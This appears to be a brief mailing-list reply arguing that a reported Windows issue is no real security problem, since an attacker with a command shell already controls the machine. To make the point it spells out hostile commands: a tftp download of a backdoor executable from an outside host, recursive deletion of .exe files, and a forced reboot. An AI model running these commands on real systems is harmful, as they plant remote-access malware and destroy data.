> a malicious user who has already gained a command shell to activate umm... you already own the box. try... tftp -i yourhost get evilbackdoor.exe ( vnc mabey ) or c:\del *.exe /s c:\shutdown -r I realy do not see the SECURITY ISSUE here. cheers, m.wood